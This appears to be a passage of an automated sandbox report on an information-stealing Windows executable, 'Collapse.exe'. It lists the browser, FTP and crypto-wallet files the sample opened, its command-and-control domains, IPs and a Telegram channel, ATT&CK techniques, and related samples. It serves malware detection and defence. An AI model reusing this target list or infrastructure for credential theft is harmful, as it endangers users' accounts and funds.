                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior

                          Remote Access Functionality

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: 1.2.Collapse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.Collapse.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Collapse.exe.42f9550.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.3294762708.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: Collapse.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Collapse.exe.f40000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Collapse.exe.42f9550.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Collapse.exe.42f9550.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2033769866.0000000000F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		211
                          Process Injection                          		23
                          Virtualization/Sandbox Evasion                          		2
                          OS Credential Dumping                          		1
                          Query Registry                          		Remote Services11
                          Archive Collected Data                          		21
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		LSASS Memory231
                          Security Software Discovery                          		Remote Desktop Protocol41
                          Data from Local System                          		1
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                          Process Injection                          		Security Account Manager23
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin Shares3
                          Clipboard Data                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                          Deobfuscate/Decode Files or Information                          		NTDS1
                          Process Discovery                          		Distributed Component Object ModelInput Capture114
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                          Obfuscated Files or Information                          		LSA Secrets1
                          Application Window Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                          Software Packing                          		Cached Domain Credentials1
                          File and Directory Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Timestomp                          		DCSync22
                          System Information Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          Collapse.exe56%VirustotalBrowse

                          Dropped Files

                          No Antivirus matches

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://sdfwfsdf.icu/z0%Avira URL Cloudsafe
                          sdfwfsdf.icu0%Avira URL Cloudsafe
                          https://sdfwfsdf.icu/r0%Avira URL Cloudsafe
                          https://sdfwfsdf.icu/0y0%Avira URL Cloudsafe
                          phygcsforum.life100%Avira URL Cloudmalware
                          https://sdfwfsdf.icu/40%Avira URL Cloudsafe
                          https://sdfwfsdf.icu/apiuo0%Avira URL Cloudsafe
                          https://sdfwfsdf.icu/api0%Avira URL Cloudsafe
                          moderzysics.top100%Avira URL Cloudmalware

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          t.me
                          		149.154.167.99
                          		truefalse
                            		high
                            sdfwfsdf.icu
                            		188.114.97.3
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              moderzysics.toptrue
                              • Avira URL Cloud: malware
                              		unknown
                              techspherxe.topfalse
                                		high
                                https://t.me/kz_prokla1false
                                  		high
                                  https://sdfwfsdf.icu/apitrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  phygcsforum.lifetrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  techmindzs.livefalse
                                    		high
                                    gadgethgfub.icufalse
                                      		high
                                      sdfwfsdf.icutrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      codxefusion.topfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://sdfwfsdf.icu/0yCollapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://sdfwfsdf.icu/apiuoCollapse.exe, 00000001.00000002.3295956102.0000000001757000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://upx.sf.netAmcache.hve.4.drfalse
                                          		high
                                          https://sdfwfsdf.icu/4Collapse.exe, 00000001.00000002.3295883257.0000000001746000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://sdfwfsdf.icu/rCollapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://sdfwfsdf.icu/zCollapse.exe, 00000001.00000002.3295883257.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          188.114.97.3
                                          		sdfwfsdf.icuEuropean Union
                                          		13335CLOUDFLARENETUStrue
                                          149.154.167.99
                                          		t.meUnited Kingdom
                                          		62041TELEGRAMRUfalse

                                          General Information

                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1630105
                                          Start date and time:2025-03-05 14:56:27 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 2s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:9
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Collapse.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@4/5@2/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 94%
                                          • Number of executed functions: 29
                                          • Number of non-executed functions: 47
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 104.208.16.94, 40.126.31.129, 52.149.20.212, 13.107.246.76
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          08:57:21API Interceptor8x Sleep call for process: Collapse.exe modified
                                          08:57:37API Interceptor1x Sleep call for process: WerFault.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          188.114.97.3r_BBVA_MensajeSWIFT04-03-2025-PDF.exeGet hashmaliciousFormBookBrowse
                                          • www.timeinsardinia.info/50g8/
                                          https://u.to/8eAUIgGet hashmaliciousHTMLPhisherBrowse
                                          • staemconmmuntiy.com/gift/id=746904
                                          rRFQ24A.exeGet hashmaliciousFormBookBrowse
                                          • www.sld6.rest/q0rl/
                                          VibeCall.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          • rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
                                          VibeCall.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          • rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
                                          VibeCall.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          • rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
                                          VibeCall.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          • rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
                                          WMnMQH4voD.exeGet hashmaliciousGhostRatBrowse
                                          • td49t43g.com/1/t4.bmp
                                          http://aptbusinessservices.com.au/Get hashmaliciousUnknownBrowse
                                          • aptbusinessservices.com.au/
                                          http://uploads-ssl.webflow.com/660018002a32edee7a11d41b/66335b965a5a96f03bd82400_kasuwidavogog.pdfGet hashmaliciousUnknownBrowse
                                          • melurilexuki.urseghy.com/favicon.ico
                                          149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                                          • telegram.org/img/emoji/40/F09F9889.png
                                          http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                          • telegram.org/img/favicon.ico
                                          http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                          • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                          http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                          • telegram.org/?setln=pl
                                          http://makkko.kz/Get hashmaliciousUnknownBrowse
                                          • telegram.org/
                                          http://telegram.dogGet hashmaliciousUnknownBrowse
                                          • telegram.dog/
                                          LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                          • t.me/cinoshibot

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          t.meq3na5Mc.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          Yanto v1.2.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          ESVoO7ywn5.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          S2W2ftXM2b.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, XWormBrowse
                                          • 149.154.167.99
                                          dealmaker.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          windows.ps1Get hashmaliciousPureLog Stealer, VidarBrowse
                                          • 149.154.167.99
                                          build.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 149.154.167.99
                                          q3na5Mc.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          brinkmanship-mlw.ps1Get hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          KMSpico.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          sdfwfsdf.icuYanto v1.2.exeGet hashmaliciousLummaC StealerBrowse
                                          • 188.114.97.3

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TELEGRAMRU20250301_173245__P20250301_173245__P.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          q3na5Mc.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          MARCH SHIPMENT PLAN DOCS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          DHL Shipping Details Ref ID 446331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                          • 149.154.167.220
                                          BBVA-P53269 .pdf.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          Purchase-New Order PO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          Cb523jmji0.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          delivery894639203.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 149.154.167.220
                                          SfbAu0ICZn.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • 149.154.167.220
                                          Yanto v1.2.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          CLOUDFLARENETUSZamowienie_522025.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.21.94.11
                                          FW_ Sam Coon shared _03-04-2025 rabofla_pdf_ with you.msgGet hashmaliciousUnknownBrowse
                                          • 1.1.1.1
                                          https://grzegorztopyla.simvoly.com/?preview=__PREVIEW_ONLYGet hashmaliciousHTMLPhisherBrowse
                                          • 104.18.11.207
                                          http://www.creditsafe.com/de/de.htmlGet hashmaliciousUnknownBrowse
                                          • 104.17.25.14
                                          https://www.bing.com/ck/a?!&&p=03393a15f6ac2f3e18e9a53e23664491f88e763b1b1f8dfe8ed088a707d16975JmltdHM9MTc0MTA0NjQwMA&ptn=3&ver=2&hsh=4&fclid=2041c032-4fae-62e3-26ce-d55e4e1e63be&u=a1aHR0cHM6Ly93d3cuc3VubmlhY2FkZW15LmNvbS90YWcvcXVyYW4tcGFkaG5hLXNpa2hlLw&ntb=1Get hashmaliciousHTMLPhisher, Invisible JSBrowse
                                          • 1.1.1.1
                                          Payment Advice.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                          • 104.21.80.1
                                          cbr.arm.elfGet hashmaliciousMiraiBrowse
                                          • 1.4.15.178
                                          output.cmdGet hashmaliciousAgentTesla, Batch Injector, Discord Token StealerBrowse
                                          • 172.67.74.152
                                          https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321fGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                          • 104.17.25.14
                                          https://x3g.tcyoopxg.ru/eNDiSHVinaTEN/Get hashmaliciousHTMLPhisher, Invisible JSBrowse
                                          • 104.16.2.189

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          a0e9f5d64349fb13191bc781f81f42e1alex2022.exeGet hashmaliciousLummaC StealerBrowse
                                          • 188.114.97.3
                                          • 149.154.167.99
                                          wBalaPT.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                          • 188.114.97.3
                                          • 149.154.167.99
                                          random(6).exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                          • 188.114.97.3
                                          • 149.154.167.99
                                          random(7).exeGet hashmaliciousLummaC StealerBrowse
                                          • 188.114.97.3
                                          • 149.154.167.99
                                          random(2).exeGet hashmaliciousLummaC StealerBrowse
                                          • 188.114.97.3
                                          • 149.154.167.99
                                          random(3).exeGet hashmaliciousLummaC StealerBrowse
                                          • 188.114.97.3
                                          • 149.154.167.99
                                          JqGBbm7.exeGet hashmaliciousLummaC StealerBrowse
                                          • 188.114.97.3
                                          • 149.154.167.99
                                          MCxU5Fj.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                          • 188.114.97.3
                                          • 149.154.167.99
                                          GMOgZgNpNu.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                          • 188.114.97.3
                                          • 149.154.167.99
                                          xIwQcY1fc4.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog StealerBrowse
                                          • 188.114.97.3
                                          • 149.154.167.99

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Collapse.exe_161f453dad368a349cc0e6c22cfabbd7c2a219e_6caf7603_cf8a2b40-cfa1-4c22-9e0b-9fbece5f611f\Report.wer

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.8886052502408956
                                          Encrypted:false
                                          SSDEEP:192:H4fVo4GgaVuiGA0LR3EaWGzuiFAZ24IO8H:YfVo4GgmuiGbLR3Ea3zuiFAY4IO8H
                                          MD5:F8FDE9331436869AC8AED20EA82634F8
                                          SHA1:57A1AA0B19172F910EF1630171F0CF2C00B31950
                                          SHA-256:20952036DBAE5ED00E6C3D65D66E8D0877385D7F30BAFCDBF23E15155FC45233
                                          SHA-512:BEFC8986355B32E24F669684DD6CA363868F74636451476E8505657548C142EB435E0C57698BE32333ECD2F60765A486CBBD223FFE77FF3DC43831D04E303662
                                          Malicious:true
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.5.6.5.6.6.3.8.0.8.0.8.7.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.5.6.5.6.6.3.8.5.9.6.5.0.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.8.a.2.b.4.0.-.c.f.a.1.-.4.c.2.2.-.9.e.0.b.-.9.f.b.e.c.e.5.f.6.1.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.6.0.7.3.3.9.-.4.b.b.9.-.4.8.6.b.-.a.a.b.1.-.f.c.d.4.7.7.6.c.c.2.9.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.o.l.l.a.p.s.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.l.i.t.i.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.9.8.-.0.0.0.1.-.0.0.1.4.-.a.8.4.3.-.a.9.8.1.d.6.8.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.e.d.2.2.a.c.4.e.5.d.4.5.6.1.a.7.5.a.6.a.e.1.6.5.c.5.8.4.3.1.c.0.0.0.0.0.0.0.0.!.0.0.0.0.b.3.4.a.d.a.7.4.3.e.5.e.4.e.d.6.b.3.4.a.e.2.8.9.4.b.0.5.7.f.8.d.f.7.5.e.f.b.7.1.!.C.o.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6334.tmp.dmp

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 15 streams, Wed Mar 5 13:57:18 2025, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):154966
                                          Entropy (8bit):3.7818204702271223
                                          Encrypted:false
                                          SSDEEP:1536:2Bq5zuBojRvpN4uE2aOILTguvAwU88pbTT3dOU4qjtTqCD9dNUjDs:2Azf4uEqILTgBN4Gd3Nk
                                          MD5:67002A2AF2247791C3C72C2E528A3022
                                          SHA1:27BDBF8073E433611CE42571BC90D9DD19EC1F1B
                                          SHA-256:0D624606BF6C3DB45788876BD35CB04AC65E160A0CA5E00F5060230604BF739C
                                          SHA-512:16965703EFDC0AFE2517062C9AFF5FAA1FFD446AB3309B4991CE771079D56D3E234D61E25BD75EAF5A986DCA78F560C92E44E9FFEB9282DDB03BCC7F6ED0CF85
                                          Malicious:false
                                          Reputation:low
                                          Preview:MDMP..a..... .......>X.g....................................$................/..........`.......8...........T...........($...9......................................................................................................eJ......P.......GenuineIntel............T...........=X.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER642F.tmp.WERInternalMetadata.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8378
                                          Entropy (8bit):3.6897253708418156
